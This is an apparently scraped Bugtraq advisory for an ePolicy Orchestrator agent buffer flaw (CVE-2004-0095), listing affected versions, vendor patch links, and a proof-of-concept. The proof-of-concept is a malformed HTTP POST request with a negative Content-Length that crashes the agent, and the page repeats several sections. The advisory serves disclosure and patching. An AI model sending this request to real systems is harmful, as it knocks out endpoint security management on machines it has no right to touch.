McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
BID:9476
Info
McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
| Bugtraq ID: | 9476 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2004-0095 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 22 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | Discovery of this vulnerability has been credited to <[email protected]>. |
| Vulnerable: |
McAfee ePolicy Orchestrator 3.0 McAfee ePolicy Orchestrator 2.5.1 McAfee ePolicy Orchestrator 2.5 SP1 McAfee ePolicy Orchestrator 2.5 McAfee ePolicy Orchestrator 2.0 McAfee ePolicy Orchestrator 1.1 McAfee ePolicy Orchestrator 1.0 |
| Not Vulnerable: | |
Discussion
McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
The McAfee ePolicy Orchestrator agent has been reported to a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability.
The issue reportedly presents itself, because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized.
The McAfee ePolicy Orchestrator agent has been reported to a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability.
The issue reportedly presents itself, because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized.
Exploit / POC
McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
The following proof-of-concept has been supplied:
POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive
The following exploit has been provided by Shashank Pandey:
The following proof-of-concept has been supplied:
POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive
The following exploit has been provided by Shashank Pandey:
Solution / Fix
McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
Solution:
The vendor has released fixes.
McAfee ePolicy Orchestrator 1.0
McAfee ePolicy Orchestrator 1.1
McAfee ePolicy Orchestrator 2.0
McAfee ePolicy Orchestrator 2.5 SP1
McAfee ePolicy Orchestrator 2.5
McAfee ePolicy Orchestrator 2.5.1
McAfee ePolicy Orchestrator 3.0
Solution:
The vendor has released fixes.
McAfee ePolicy Orchestrator 1.0
-
Network Associates EPO3013.zip
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
McAfee ePolicy Orchestrator 1.1
-
Network Associates EPO3013.zip
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
McAfee ePolicy Orchestrator 2.0
-
Network Associates EPO3013.zip
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
McAfee ePolicy Orchestrator 2.5 SP1
-
Network Associates EPO3013.zip
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
McAfee ePolicy Orchestrator 2.5
-
Network Associates EPO3013.zip
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
McAfee ePolicy Orchestrator 2.5.1
-
Network Associates EPO3013.zip
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
McAfee ePolicy Orchestrator 3.0
-
Network Associates EPO3013.zip
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
References
McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
References:
References:
- McAfee Homepage (McAfee)